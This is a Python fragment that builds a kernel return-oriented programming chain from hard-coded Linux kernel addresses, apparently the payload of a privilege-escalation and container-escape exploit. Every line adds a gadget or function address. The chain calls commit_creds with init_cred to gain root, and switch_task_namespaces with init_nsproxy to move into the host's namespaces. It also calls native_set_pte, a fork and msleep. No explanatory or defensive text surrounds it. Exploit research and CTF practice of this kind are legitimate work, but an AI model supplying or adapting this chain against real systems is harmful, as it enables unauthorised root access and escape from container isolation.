chain = b""
chain += p64(0xffffffff8189c0de)	# pop rdi; ret 
chain += p64(0xffffffff8368b220)	# init_cred
chain += p64(0xffffffff8114d3a0)	# commit_creds
chain += p64(0xffffffff8189c0de)	# pop rdi; ret 
chain += p64(0x1)
chain += p64(0xffffffff8113fb50)	# find_task_by_vpid
chain += p64(0xffffffff816ea64d)	# pop rdi; mov esi, 0x8948ffd2; ret 
chain += p64(0xffffffff83600118)
chain += p64(0xffffffff818be4b4)	# pop rsi; ret 
chain += p64(0xffffffff82504104)	# srso_alias_safe_ret
chain += p64(0xffffffff810cd6f0)	# native_set_pte
chain += p64(0xffffffff818765a0)	# pop rbp; ret 
chain += p64(0xffffffff836000d0)
chain += p64(0xffffffff81aca592)	# push rax; pop rdi; call qword ptr [rbp + 0x48]
chain += p64(0xffffffff818be4b4)	# pop rsi; ret 
chain += p64(0xffffffff8368ad00)	# init_nsproxy
chain += p64(0xffffffff8114b250)	# switch_task_namespaces
chain += p64(0xffffffff8110a370)	# __x64_sys_fork
chain += p64(0xffffffff8189c0de)	# pop rdi; ret 
chain += p64(0xffffffff)
chain += p64(0xffffffff81213580)	# msleep
chain += p64(0xffffffff819c4490)
